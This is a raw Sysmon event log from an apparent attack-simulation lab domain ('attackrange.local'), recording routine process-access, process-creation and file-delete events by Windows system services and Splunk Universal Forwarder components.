07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808300Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:25.549{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F5A9-60EB-9179-00000000D001}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808299Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808298Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808297Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5A9-60EB-9179-00000000D001}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808296Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.534{0C1E0330-F5A9-60EB-9179-00000000D001}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808295Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.393{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=197F1AFF992C7364ADD3FCE246A44222,SHA256=AAF7901CAC38A586C7BC07FC31753CA51A597F8AF6337E4D71EE8DCBF53C9703,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808294Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.393{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4983F6A885320869D494F5F2E33196BC,SHA256=51628AA4F2E356C69B955E88424F428DCED52C1B9EA0E378D64668C09BFF1E1A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808340Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:26.987{0C1E0330-F5AA-60EB-9379-00000000D001}26683788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808339Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5AA-60EB-9379-00000000D001}2668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808338Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808337Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808336Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808335Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808334Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808333Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808332Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808331Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808330Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:26.799{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808329Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.784{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F5AA-60EB-9379-00000000D001}2668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808328Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.784{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5AA-60EB-9379-00000000D001}2668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808327Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.785{0C1E0330-F5AA-60EB-9379-00000000D001}2668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808326Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.659{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AA9EDD0F97900A2E75160A8227D77D1,SHA256=F926F85F9FD9D29419A18FE1484B5B99A8E35F5E4F5D95E2302F64CCEC6735FF,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:26.657{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10754B97E0EA3833D2ED68F7DC2A35FD,SHA256=D74992F317196E3A7A1CDE8093EFDADE127226FA22D7C72B751EA10AF2005459,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808325Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.596{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=197F1AFF992C7364ADD3FCE246A44222,SHA256=AAF7901CAC38A586C7BC07FC31753CA51A597F8AF6337E4D71EE8DCBF53C9703,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808324Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5AA-60EB-9279-00000000D001}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808323Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808322Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808321Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808320Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 